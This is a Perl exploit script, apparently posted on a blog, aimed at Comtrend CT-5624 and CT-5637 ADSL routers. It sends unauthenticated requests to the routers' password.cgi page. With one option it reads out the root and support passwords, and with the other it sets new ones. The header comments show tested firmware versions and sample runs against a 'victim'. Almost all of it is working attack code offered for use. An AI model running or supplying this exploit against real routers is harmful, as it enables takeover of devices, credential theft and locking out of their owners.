#!/usr/bin/perl |
# |
# [+] Comtrend Router CT-5624 Remote Root/Support Password Disclosure/Change Exploit |
# |
# Author: Todor Donev |
# Email: todor.donev@@gmail |
# Type: Hardware |
# Vuln Type: Remote |
# |
# Tested: |
# Board ID : CT-5624 |
# Software : A011-306TSR-C01_R03 |
# Bootloader : 1.0.37-0.7-3 |
# ADSL : A2pB022c3.d20e |
# |
# Board ID : CT-5637 |
# Software : A111-312BTC-C01_R12 |
# Bootloader : 1.0.37-12.1-1 |
# ADSL : A2pB023k.d20k_rc2 |
# |
##### |
# CT-5624 ADSL2+ Ethernet Router |
# The CT-5624 series ADSL2+ compact and high performance Ethernet router |
# provides four 10/100 Ethernet Interfaces, and one ADSL line interface |
# to access the Internet, incorporating LAN or Video on Demand over one |
# ordinary telephone line, at speeds of up to 24 Mbps. It also has full |
# routing capabilities to segment/route IP protocol, and supports advanced |
# security functions. |
##### |
# |
# playground$ perl comtrend.pl -c 192.168.1.1:80 |
# [+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit |
# [!] Target: 192.168.1.1:80 |
# [o] New root password: root31337 |
# [o] New support password: sup31337 |
# [*] Successfully !! |
## |
# playground$ perl comtrend.pl -d 192.168.1.1:80 |
# [+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit |
# [!] Target: 192.168.1.1:80 |
# [o] root: root31337 |
# [o] support: sup31337 |
## |
# playground$ perl comtrend.pl |
# [+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit |
# [!] usg: perl comtrend.pl [-c or -d] <victim> |
# [!] -d: Disclosure Root/Support password |
# [!] -c: Change Root/Support password |
# |
##### |
# Thanks to Tsvetelina Emirska |
# for the help and support which gives me =) |
##### |
use LWP::Simple; |
print "[+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit\n"; |
if (@ARGV == 0) {&usg;} |
while (@ARGV > 0) { |
$type = shift(@ARGV); |
$t = shift(@ARGV); |
if ($type eq "-d") { |
my $r = get("http://$t/password.cgi") or die("suck!"); |
print "[!] Target: $t\n"; |
if ($r =~ m/pwdAdmin = '(.*)';/g) { |
$result .= "[o] root: $1\n"; |
} |
if ($r =~ m/pwdSupport = '(.*)';/g) { |
$result .= "[o] support: $1\n"; |
print $result; |
}}} |
if ($type eq "-c") { |
print "[!] Target: $t\n"; |
print "[o] New root password: "; |
my $rootpass=<STDIN>; |
chomp($rootpass); |
print "[o] New support password: "; |
my $suppass=<STDIN>; |
chomp($suppass); |
my $r = get("http://$t/password.cgi?sysPassword=$rootpass&sptPassword=$suppass") or die("suck!"); |
if ($r =~ m/pwdAdmin = '$rootpass';/g) { |
print "[*] Successfully !!\n"; |
}} |
sub usg(){ |
print "[!] usg: perl comtrend.pl [-c or -d] <victim>\n"; |
print "[!] -d: Disclosure Root/Support password\n"; |
print "[!] -c: Change Root/Support password\n"; |
exit; |
} |
No comments:
Post a Comment